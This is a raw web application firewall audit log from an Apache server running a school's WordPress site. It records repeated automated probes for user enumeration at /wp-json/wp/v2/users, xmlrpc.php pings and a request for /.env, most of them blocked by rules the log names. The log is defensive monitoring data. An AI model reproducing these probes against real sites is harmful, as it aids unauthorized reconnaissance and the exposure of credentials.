--a8101b4e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8101b4e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746305111610232 16476 (- - -) Stopwatch2: 1746305111610232 16476; combined=25218, p1=612, p2=3624, p3=32, p4=33, p5=10472, sr=82, sw=60, l=0, gc=10385 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8101b4e-Z-- --b0699e2c-A-- [04/May/2025:03:45:27 +0700] aBaAZ0SOhfQ6W15Bgg8SKQAAAFg 103.236.140.4 51466 103.236.140.4 8181 --b0699e2c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b0699e2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0699e2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746305127098891 3353 (- - -) Stopwatch2: 1746305127098891 3353; combined=1348, p1=459, p2=857, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0699e2c-Z-- --00429d6d-A-- [04/May/2025:03:45:34 +0700] aBaAbkSOhfQ6W15Bgg8SKwAAAEU 103.236.140.4 51470 103.236.140.4 8181 --00429d6d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.209 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --00429d6d-C-- demo.sayHello --00429d6d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --00429d6d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746305134619329 5389 (- - -) Stopwatch2: 1746305134619329 5389; combined=4127, p1=457, p2=3419, p3=32, p4=33, p5=121, sr=69, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00429d6d-Z-- --c7b6c96c-A-- [04/May/2025:03:45:57 +0700] aBaAhUSOhfQ6W15Bgg8SLAAAAEc 103.236.140.4 51474 103.236.140.4 8181 --c7b6c96c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.113.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.113.115 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c7b6c96c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7b6c96c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746305157219851 3056 (- - -) Stopwatch2: 1746305157219851 3056; combined=1393, p1=481, p2=880, p3=0, p4=0, p5=32, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7b6c96c-Z-- --73d64e1d-A-- [04/May/2025:03:46:04 +0700] aBaAjCleQJs6d7wanHHVMgAAAMY 103.236.140.4 51482 103.236.140.4 8181 --73d64e1d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.113.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.113.115 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --73d64e1d-C-- demo.sayHello --73d64e1d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --73d64e1d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746305164102901 6137 (- - -) Stopwatch2: 1746305164102901 6137; combined=4517, p1=603, p2=3687, p3=33, p4=37, p5=93, sr=104, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73d64e1d-Z-- --22ee6731-A-- [04/May/2025:03:46:14 +0700] aBaAloOgvPi2IO4kz1sCcwAAAIc 103.236.140.4 51510 103.236.140.4 8181 --22ee6731-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.77 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --22ee6731-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22ee6731-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746305174860102 3211 (- - -) Stopwatch2: 1746305174860102 3211; combined=1474, p1=470, p2=972, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22ee6731-Z-- --0da8a960-A-- [04/May/2025:03:46:20 +0700] aBaAnMP0ZqGY3Jj2X92cvgAAAAc 103.236.140.4 51516 103.236.140.4 8181 --0da8a960-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.77 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0da8a960-C-- demo.sayHello --0da8a960-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0da8a960-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746305180156580 4367 (- - -) Stopwatch2: 1746305180156580 4367; combined=3023, p1=440, p2=2423, p3=26, p4=28, p5=63, sr=61, sw=43, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0da8a960-Z-- --aa5ba774-A-- [04/May/2025:03:46:28 +0700] aBaApLRQKtQAGKxHb0rAwQAAAII 103.236.140.4 51532 103.236.140.4 8181 --aa5ba774-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.140 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --aa5ba774-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa5ba774-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746305188692275 3563 (- - -) Stopwatch2: 1746305188692275 3563; combined=1367, p1=500, p2=837, p3=0, p4=0, p5=30, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa5ba774-Z-- --e65b4200-A-- [04/May/2025:03:46:34 +0700] aBaAqrRQKtQAGKxHb0rAwwAAAIQ 103.236.140.4 51544 103.236.140.4 8181 --e65b4200-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.140 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.140 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e65b4200-C-- demo.sayHello --e65b4200-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e65b4200-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746305194644723 6294 (- - -) Stopwatch2: 1746305194644723 6294; combined=4263, p1=602, p2=3429, p3=34, p4=39, p5=93, sr=76, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e65b4200-Z-- --f6d04a2e-A-- [04/May/2025:03:47:46 +0700] aBaA8mJEE9ao5dcyYWnrwwAAAIA 103.236.140.4 51560 103.236.140.4 8181 --f6d04a2e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.79 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f6d04a2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6d04a2e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746305266256520 4241 (- - -) Stopwatch2: 1746305266256520 4241; combined=1912, p1=767, p2=1115, p3=0, p4=0, p5=30, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6d04a2e-Z-- --f1c11176-A-- [04/May/2025:03:47:50 +0700] aBaA9mJEE9ao5dcyYWnrxAAAAIM 103.236.140.4 51564 103.236.140.4 8181 --f1c11176-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.79 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f1c11176-C-- demo.sayHello --f1c11176-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1c11176-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746305270991341 7056 (- - -) Stopwatch2: 1746305270991341 7056; combined=4941, p1=657, p2=4005, p3=37, p4=43, p5=114, sr=94, sw=85, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1c11176-Z-- --7a15cd20-A-- [04/May/2025:04:32:26 +0700] aBaLavnZiHJYHUAF8QfZawAAAAM 103.236.140.4 53448 103.236.140.4 8181 --7a15cd20-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 146.190.141.52 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 146.190.141.52 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --7a15cd20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a15cd20-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746307946532750 907 (- - -) Stopwatch2: 1746307946532750 907; combined=375, p1=336, p2=0, p3=0, p4=0, p5=39, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a15cd20-Z-- --e1891a35-A-- [04/May/2025:04:35:25 +0700] aBaMHdsVQyl9V2B8Pt-qcgAAAEk 103.236.140.4 53462 103.236.140.4 8181 --e1891a35-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.173 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e1891a35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1891a35-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746308125618137 3663 (- - -) Stopwatch2: 1746308125618137 3663; combined=1526, p1=521, p2=973, p3=0, p4=0, p5=32, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1891a35-Z-- --d0e33264-A-- [04/May/2025:04:35:34 +0700] aBaMJvnZiHJYHUAF8QfZcAAAAAo 103.236.140.4 53466 103.236.140.4 8181 --d0e33264-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.173 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d0e33264-C-- demo.sayHello --d0e33264-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0e33264-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746308134602491 6125 (- - -) Stopwatch2: 1746308134602491 6125; combined=4281, p1=603, p2=3495, p3=23, p4=25, p5=78, sr=116, sw=57, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0e33264-Z-- --167e6f6d-A-- [04/May/2025:04:42:05 +0700] aBaNrfnZiHJYHUAF8QfZdQAAABM 103.236.140.4 55156 103.236.140.4 8181 --167e6f6d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.218 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --167e6f6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --167e6f6d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746308525569674 2845 (- - -) Stopwatch2: 1746308525569674 2845; combined=1256, p1=437, p2=778, p3=0, p4=0, p5=41, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --167e6f6d-Z-- --f388f718-A-- [04/May/2025:04:42:15 +0700] aBaNt_nZiHJYHUAF8QfZegAAAAE 103.236.140.4 55188 103.236.140.4 8181 --f388f718-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.218 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f388f718-C-- demo.sayHello --f388f718-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f388f718-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746308535951083 5940 (- - -) Stopwatch2: 1746308535951083 5940; combined=4311, p1=631, p2=3530, p3=21, p4=23, p5=62, sr=143, sw=44, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f388f718-Z-- --37c2f61e-A-- [04/May/2025:04:42:41 +0700] aBaN0echPF6irSergtv7FwAAAMo 103.236.140.4 55194 103.236.140.4 8181 --37c2f61e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.210 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --37c2f61e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37c2f61e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746308561778257 3324 (- - -) Stopwatch2: 1746308561778257 3324; combined=1384, p1=497, p2=857, p3=0, p4=0, p5=30, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
